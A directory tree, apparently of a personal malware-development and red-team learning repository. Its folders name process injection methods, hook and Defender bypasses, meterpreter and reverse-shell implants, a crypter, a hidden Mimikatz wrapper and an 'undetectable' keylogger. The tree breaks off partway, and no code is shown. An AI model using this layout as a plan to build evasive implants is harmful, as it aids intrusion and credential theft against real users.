├── Assembly ├── Linx86-64 │ ├── Readme.md │ ├── call_program │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ └── call_me.o │ ├── execve │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ ├── call_me.o │ │ ├── call_me.so │ │ ├── dump.txt │ │ ├── system.bin │ │ ├── system.c │ │ └── system_O3.bin │ ├── fork_execve │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ ├── call_me.o │ │ ├── dump.txt │ │ ├── how-to │ │ ├── system.bin │ │ ├── system.c │ │ └── useful.txt │ ├── fork_execve_shell │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ ├── call_me.o │ │ ├── dump.txt │ │ ├── how-to │ │ ├── system.bin │ │ ├── system.c │ │ └── useful.txt │ ├── hello_world │ │ ├── hello │ │ ├── hello.o │ │ └── hello_world.asm │ ├── print_args │ │ ├── print_args │ │ ├── print_args.asm │ │ ├── print_args.assembly │ │ └── print_args.o │ └── push_ret │ │ ├── test │ │ ├── test.asm │ │ ├── test.assembly │ │ ├── test.bin │ │ └── test.o ├── Readme.md ├── Winx32 │ ├── Readme.md │ ├── hellow.asm │ ├── hellow.exe │ ├── hellow.lst │ └── hellow.obj └── Winx64 │ ├── Readme.md │ ├── asm_1 │ ├── hello-win.asm │ ├── hello-win.exe │ ├── hello-win.obj │ ├── hello64.asm │ ├── hello64.fas │ ├── hello64.lst │ ├── hello64.obj │ ├── make │ ├── test.exe │ └── test64.exe │ ├── asm_2 │ ├── hello.asm │ ├── hello.exe │ ├── hello.lst │ ├── hello_new.assembly │ ├── hello_new.exe │ └── hello_new.obj │ ├── call_stack │ ├── Readme.md │ ├── main_clean.cpp │ ├── main_clean.exe │ ├── main_dirty.cpp │ ├── payload.asm │ └── ramp.asm │ └── payloads │ ├── 1.popcalc │ ├── popcalc.asm │ ├── popcalc.exe │ └── popcalc.o │ ├── 2.cmd │ ├── new_cmd.asm │ ├── new_cmd.exe │ └── new_cmd.o │ ├── 3.powershell_multi_command │ ├── new_powershell.asm │ ├── new_powershell.exe │ └── new_powershell.o │ ├── 4.changable_api │ ├── Readme.md │ ├── any_api.asm │ ├── any_api.exe │ 
└── any_api.o │ ├── 5.ZeroTotal │ ├── Readme.md │ └── calc │ │ └── calc_binja.bin │ ├── 6.meterpreter │ ├── Readme.md │ └── meterpreter_stageless.bin │ └── Readme.md ├── C# ├── CreateProcess │ ├── CreateProcess.sln │ ├── CreateProcess │ │ ├── CreateProcess.csproj │ │ ├── Program.cs │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── CreateProcess.deps.json │ │ │ │ ├── CreateProcess.dll │ │ │ │ ├── CreateProcess.exe │ │ │ │ ├── CreateProcess.pdb │ │ │ │ ├── CreateProcess.runtimeconfig.dev.json │ │ │ │ └── CreateProcess.runtimeconfig.json │ │ └── obj │ │ │ ├── CreateProcess.csproj.nuget.dgspec.json │ │ │ ├── CreateProcess.csproj.nuget.g.props │ │ │ ├── CreateProcess.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── CreateProcess.AssemblyInfo.cs │ │ │ │ ├── CreateProcess.AssemblyInfoInputs.cache │ │ │ │ ├── CreateProcess.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── CreateProcess.assets.cache │ │ │ │ ├── CreateProcess.csproj.AssemblyReference.cache │ │ │ │ ├── CreateProcess.csproj.CoreCompileInputs.cache │ │ │ │ ├── CreateProcess.csproj.FileListAbsolute.txt │ │ │ │ ├── CreateProcess.dll │ │ │ │ ├── CreateProcess.genruntimeconfig.cache │ │ │ │ ├── CreateProcess.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md ├── DInvoke │ ├── CreateProcess_DInvoke │ │ ├── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ │ ├── ConsoleApp1.csproj │ │ │ │ ├── Program.cs │ │ │ │ ├── bin │ │ │ │ └── Debug │ │ │ │ │ └── netcoreapp3.1 │ │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ │ ├── ConsoleApp1.runtimeconfig.json │ │ │ │ │ ├── DInvoke.dll │ │ │ │ │ └── DInvoke.pdb │ │ │ │ └── obj │ │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ │ ├── Debug │ 
│ │ │ └── netcoreapp3.1 │ │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete │ │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ │ └── apphost.exe │ │ │ │ ├── project.assets.json │ │ │ │ └── project.nuget.cache │ │ └── Readme.md │ ├── MessageBoxW_DIvoke │ │ ├── MessageBoxW_DIvoke.sln │ │ └── MessageBoxW_DIvoke │ │ │ ├── MessageBoxW_DInvoke.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── DInvoke.dll │ │ │ │ ├── DInvoke.pdb │ │ │ │ ├── MessageBoxW_DInvoke.deps.json │ │ │ │ ├── MessageBoxW_DInvoke.dll │ │ │ │ ├── MessageBoxW_DInvoke.exe │ │ │ │ ├── MessageBoxW_DInvoke.pdb │ │ │ │ ├── MessageBoxW_DInvoke.runtimeconfig.dev.json │ │ │ │ └── MessageBoxW_DInvoke.runtimeconfig.json │ │ │ └── obj │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── DInvoke.dll │ │ │ │ ├── MessageBoxW_DInvoke.AssemblyInfo.cs │ │ │ │ ├── MessageBoxW_DInvoke.AssemblyInfoInputs.cache │ │ │ │ ├── MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── MessageBoxW_DInvoke.assets.cache │ │ │ │ ├── MessageBoxW_DInvoke.csproj.AssemblyReference.cache │ │ │ │ ├── MessageBoxW_DInvoke.csproj.CopyComplete │ │ │ │ ├── MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache │ │ │ │ ├── MessageBoxW_DInvoke.csproj.FileListAbsolute.txt │ │ │ │ ├── MessageBoxW_DInvoke.dll │ │ │ │ ├── MessageBoxW_DInvoke.genruntimeconfig.cache │ │ │ │ ├── MessageBoxW_DInvoke.pdb │ │ │ │ ├── MessageBoxW_DIvoke.AssemblyInfo.cs │ │ │ │ ├── MessageBoxW_DIvoke.AssemblyInfoInputs.cache │ │ │ │ ├── MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig 
│ │ │ │ ├── MessageBoxW_DIvoke.assets.cache │ │ │ │ ├── MessageBoxW_DIvoke.csproj.AssemblyReference.cache │ │ │ │ └── apphost.exe │ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.dgspec.json │ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.g.props │ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.g.targets │ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.dgspec.json │ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.g.props │ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.g.targets │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── Readme.md │ └── Syscalls_DInvoke │ │ ├── ConsoleApp1 │ │ ├── ConsoleApp1.sln │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ ├── ConsoleApp1.runtimeconfig.json │ │ │ │ ├── DInvoke.dll │ │ │ │ └── DInvoke.pdb │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ │ └── Readme.md ├── HookBypass │ ├── ConsoleApp1 │ │ ├── ConsoleApp1.sln │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── 
ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ ├── ConsoleApp1.runtimeconfig.json │ │ │ │ ├── DInvoke.dll │ │ │ │ └── DInvoke.pdb │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md ├── Ordinal │ ├── Readme.md │ ├── message_box_ordinal.sln │ └── message_box_ordinal │ │ ├── Program.cs │ │ ├── bin │ │ └── Debug │ │ │ └── netcoreapp3.1 │ │ │ ├── message_box_ordinal.deps.json │ │ │ ├── message_box_ordinal.dll │ │ │ ├── message_box_ordinal.exe │ │ │ ├── message_box_ordinal.pdb │ │ │ ├── message_box_ordinal.runtimeconfig.dev.json │ │ │ └── message_box_ordinal.runtimeconfig.json │ │ ├── message_box_ordinal.csproj │ │ └── obj │ │ ├── Debug │ │ └── netcoreapp3.1 │ │ │ ├── apphost.exe │ │ │ ├── message_box_ordinal.AssemblyInfo.cs │ │ │ ├── message_box_ordinal.AssemblyInfoInputs.cache │ │ │ ├── message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig │ │ │ ├── message_box_ordinal.assets.cache │ │ │ ├── message_box_ordinal.csproj.CoreCompileInputs.cache │ │ │ ├── message_box_ordinal.csproj.FileListAbsolute.txt │ │ │ ├── message_box_ordinal.dll │ │ │ ├── message_box_ordinal.genruntimeconfig.cache │ │ │ └── message_box_ordinal.pdb │ │ ├── 
message_box_ordinal.csproj.nuget.dgspec.json │ │ ├── message_box_ordinal.csproj.nuget.g.props │ │ ├── message_box_ordinal.csproj.nuget.g.targets │ │ ├── project.assets.json │ │ └── project.nuget.cache ├── PInvoke │ ├── PInvoke.sln │ ├── PInvoke │ │ ├── PInvoke.csproj │ │ ├── Program.cs │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── PInvoke.deps.json │ │ │ │ ├── PInvoke.dll │ │ │ │ ├── PInvoke.exe │ │ │ │ ├── PInvoke.pdb │ │ │ │ ├── PInvoke.runtimeconfig.dev.json │ │ │ │ └── PInvoke.runtimeconfig.json │ │ └── obj │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── PInvoke.AssemblyInfo.cs │ │ │ │ ├── PInvoke.AssemblyInfoInputs.cache │ │ │ │ ├── PInvoke.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── PInvoke.assets.cache │ │ │ │ ├── PInvoke.csproj.AssemblyReference.cache │ │ │ │ ├── PInvoke.csproj.CoreCompileInputs.cache │ │ │ │ ├── PInvoke.csproj.FileListAbsolute.txt │ │ │ │ ├── PInvoke.dll │ │ │ │ ├── PInvoke.genruntimeconfig.cache │ │ │ │ ├── PInvoke.pdb │ │ │ │ └── apphost.exe │ │ │ ├── PInvoke.csproj.nuget.dgspec.json │ │ │ ├── PInvoke.csproj.nuget.g.props │ │ │ ├── PInvoke.csproj.nuget.g.targets │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md ├── ProcessInjection │ ├── ProcessInjection_CreateRemoteThread │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── 
ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── ProcessInjection_CreateThread │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── ProcessInjection_NtMapViewOfSection │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── 
ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── ProcessInjection_QueueUserAPC │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md └── Readme.md ├── C ├── Readme.md ├── code_exec │ ├── Readme.md │ ├── system.bin │ └── system.c ├── custom_payload │ ├── Readme.md │ ├── beautify.py │ ├── call_me │ ├── call_me.asm │ ├── call_me.assembly │ ├── call_me.o │ ├── call_me_2.bak │ ├── dump.txt │ ├── how-to │ ├── system.bin │ 
├── system.c │ └── useful.txt ├── meterpreter │ ├── Readme.md │ ├── meterpreter_re_me.exe │ ├── meterpreter_re_me_x64.c │ ├── meterpreter_re_me_x86.c │ ├── patchmeup_meterpreter.c │ └── patchmeup_meterpreter.exe └── undetectable │ ├── compile.bat │ ├── keylogger.h │ ├── undetectable.c │ └── undetectable.exe ├── Certs ├── Certificate-Steve S.pdf ├── Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf ├── Malware Development Advanced - Vol.1-certificate.pdf ├── Malware Development Advanced - Vol.2-certificate.pdf ├── RTMLS_2024-06-14.pdf ├── Readme.md ├── Red-Team-Ops-Completion.jpg ├── Red-Team-Ops-II-Completion.jpg ├── Sektor7_Malware Development Essentials-certificate.pdf ├── Sektor7_Malware Development Intermediate-certificate.pdf ├── Sektor7_Windows Evasion-certificate.pdf ├── THM-JrPenTester.png ├── THM-Offensive_Pentesting.png ├── THM-Red_Team_Learning_Path.png ├── Udemy_Linux-PEAS.jpg ├── Udemy_RE-Exploit-Dev.jpg ├── Udemy_RE-Malware-Net-Java.jpg ├── Udemy_RE-Radare2.jpg ├── Udemy_RE-Windows-GUI.jpg ├── Udemy_Windows-PEAS.jpg ├── Udemy_build_undetectable_malware_in_c.jpg ├── VHL_Advanced+_Certificate.pdf ├── VHL_Basic_Certificate.pdf ├── ZPS_DevOps_For_Pentesters.jpg └── zps_initial_access_cert.jpg ├── Cpp ├── BYOdll │ ├── version1 │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ └── implant.exe │ ├── version2 │ │ ├── Readme.md │ │ ├── aesencrypt.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ └── implant.exe │ └── version3 │ │ ├── Readme.md │ │ ├── compile.bat │ │ └── implant.cpp ├── Readme.md ├── badAsm │ ├── badAsm.exe │ ├── badAsm.exe.stackdump │ ├── badAsm_better.exe │ ├── badAsm_rx.exe │ ├── main.cpp │ ├── main_better.cpp │ └── main_rx.cpp ├── bad_fn_ptr │ ├── bad_fn_ptr.sln │ ├── bad_fn_ptr │ │ ├── bad_fn_ptr.cpp │ │ ├── bad_fn_ptr.vcxproj │ │ ├── bad_fn_ptr.vcxproj.filters │ │ ├── bad_fn_ptr.vcxproj.user │ │ └── x64 │ │ │ └── Debug │ │ │ ├── bad_fn_ptr.exe.recipe │ │ │ ├── bad_fn_ptr.log │ │ │ ├── bad_fn_ptr.obj │ │ 
│ ├── bad_fn_ptr.tlog │ │ │ ├── CL.command.1.tlog │ │ │ ├── CL.read.1.tlog │ │ │ ├── CL.write.1.tlog │ │ │ ├── bad_fn_ptr.lastbuildstate │ │ │ ├── link.command.1.tlog │ │ │ ├── link.read.1.tlog │ │ │ ├── link.write.1.tlog │ │ │ └── link.write.2u.tlog │ │ │ ├── vc143.idb │ │ │ └── vc143.pdb │ └── x64 │ │ └── Debug │ │ ├── bad_fn_ptr.exe │ │ ├── bad_fn_ptr.exp │ │ ├── bad_fn_ptr.lib │ │ └── bad_fn_ptr.pdb ├── call_stack │ ├── compile.bat │ ├── main_clean.cpp │ ├── main_clean.exe │ ├── main_dirty.cpp │ ├── main_dirty.exe │ ├── payload.asm │ ├── payload.o │ ├── ramp.asm │ └── ramp.o ├── clean_stacks │ ├── baseline.cpp │ ├── baseline.exe │ ├── implant.cpp │ ├── implant.exe │ ├── implant_backup_1.cpp │ ├── implant_backup_2.cpp │ ├── payload.asm │ ├── payload.o │ ├── ramp.asm │ └── ramp.o ├── create_process │ ├── CreateProcess.cpp │ ├── CreateProcess.exe │ └── Readme.md ├── crypter │ ├── compile.bat │ ├── crypter.exe │ ├── main.cpp │ ├── main.obj │ ├── out.txt │ └── test.txt ├── deceiving_defender │ ├── BigStackBypass │ │ ├── build_the_sleigh.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ ├── implant.exe │ │ ├── meterpreter │ │ │ ├── Readme.md │ │ │ ├── beautify.py │ │ │ ├── build_the_sleigh.py │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── sleight.txt │ │ ├── vt-results-2022-12-28.png │ │ ├── vt_results.txt │ │ └── windows-wallpaper.jpg │ ├── Readme.md │ ├── name_bypass │ │ ├── Readme.md │ │ ├── compile.bat │ │ ├── implant.cpp │ │ └── implant.exe │ └── one │ │ ├── compile.bat │ │ ├── implant.cpp │ │ ├── implant.exe │ │ └── implant.obj ├── embedding_payloads │ ├── Readme.md │ ├── x64 │ │ ├── calc_x64.bin │ │ ├── compile.bat │ │ ├── even_better_x64.exe │ │ ├── even_better_x64_PATCHED.exe │ │ ├── even_better_x64_PATCHED_goto_MAIN.exe │ │ ├── even_better_x64_reloc.exe │ │ ├── good.cpp │ │ ├── good_x64.exe │ │ └── test.c │ └── x86 │ │ ├── calc_payload_32.bin │ │ ├── compile.bat │ │ ├── even_better.exe │ │ ├── even_better_ansi.exe │ │ ├── good.cpp │ │ ├── good.exe │ │ ├── 
good.obj │ │ ├── good_no_names.exe │ │ ├── good_w_names.exe │ │ ├── x86_broken_log.txt │ │ └── x86_working_log.txt ├── hidden_mimikatz │ ├── Readme.md │ ├── mimikatz.exe │ └── wrapper │ │ ├── aesencrypt.py │ │ ├── compile.bat │ │ ├── favicon.ico │ │ ├── mimikatz.cpp │ │ ├── mimikatz.exe │ │ ├── mimikatz.obj │ │ ├── resources.h │ │ ├── resources.o │ │ ├── resources.rc │ │ ├── resources.res │ │ └── shellcode.bin ├── making_malware │ ├── Readme.md │ ├── implantv1 │ │ ├── beautify.py │ │ ├── compile.bat │ │ ├── implant.obj │ │ ├── implantv1.cpp │ │ ├── implantv1.exe │ │ ├── implantv1.obj │ │ └── xorencrypt.py │ ├── implantv2 │ │ ├── aesencrypt.py │ │ ├── compile.bat │ │ ├── implant.exe │ │ ├── implantv2.cpp │ │ ├── implantv2.cpp.bak │ │ ├── implantv2.obj │ │ ├── reverseDLL.bin │ │ ├── reverseDLL.txt │ │ └── reverseDLL │ │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ ├── ShellcodeRDI.py │ │ │ ├── ShellcodeRDI.pyc │ │ │ ├── __pycache__ │ │ │ │ ├── ShellcodeRDI.cpython-311.pyc │ │ │ │ └── ShellcodeRDI.cpython-38.pyc │ │ │ └── reverseDLL.txt │ │ │ ├── compileDLL.bat │ │ │ ├── reverse.bin │ │ │ ├── reverse.dll │ │ │ ├── reverseDLL.bin │ │ │ └── reverseDLL.cpp │ ├── implantv3 │ │ ├── Main.cpp │ │ ├── Readme.md │ │ └── x64 │ │ │ └── Release │ │ │ ├── implant.exe │ │ │ └── implantv3.pdb │ ├── misc │ │ ├── mm#1 │ │ │ └── Main.cpp │ │ ├── mm#2 │ │ │ ├── Main.cpp │ │ │ └── Readme.md │ │ └── readme.md │ └── revshell │ │ ├── beautify.py │ │ ├── compile.bat │ │ ├── payload.out │ │ ├── reverse.cpp │ │ ├── reverse.exe │ │ ├── reverse.obj │ │ ├── reverseDLL.bin │ │ ├── reverseDLL.txt │ │ ├── reverseDLL │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ ├── ShellcodeRDI.py │ │ │ ├── ShellcodeRDI.pyc │ │ │ ├── __pycache__ │ │ │ │ ├── ShellcodeRDI.cpython-311.pyc │ │ │ │ └── ShellcodeRDI.cpython-38.pyc │ │ │ └── reverseDLL.txt │ │ ├── compileDLL.bat │ │ ├── reverse.dll │ │ ├── reverseDLL.bin │ │ └── reverseDLL.cpp │ │ ├── 
reverseEXE.bin │ │ └── reverseEXE.txt ├── message_box │ ├── Readme.md │ ├── message_box.cpp │ └── message_box.exe ├── recursion_off_the_disk │ ├── ROTD │ │ ├── ROTD.exe │ │ ├── ROTD.pdb │ │ ├── ROTD_orig.exe │ │ ├── compile.bat │ │ ├── favicon.ico │ │ ├── resources.h │ │ ├── resources.o │ │ ├── resources.rc │ │ ├── resources.res │ │ ├── reverse_shell.bin │ │ ├── rotd.cpp │ │ ├── rotd.obj │ │ └── xorencrypt.py │ ├── Readme.md │ └── reverse_shell │ │ ├── compile.bat │ │ ├── reverse_shell.cpp │ │ ├── reverse_shell.exe │ │ └── reverse_shell.obj ├── rsrc_injection │ ├── Readme.md │ ├── compile.bat │ ├── favicon.ico │ ├── implant.cpp │ ├── implant.exe │ ├── implant.obj │ ├── msgbox64.bin │ ├── resources.h │ ├── resources.o │ ├── resources.rc │ ├── resources.res │ └── xorencrypt.py └── rsrc_injection_shell │ ├── Readme.md │ ├── compile.bat │ ├── favicon.ico │ ├── implant.cpp │ ├── implant.exe │ ├── implant.obj │ ├── implant_noemul.exe │ ├── resources.h │ ├── resources.o │ ├── resources.rc │ ├── resources.res │ ├── reverse_shell │ ├── compile.bat │ ├── 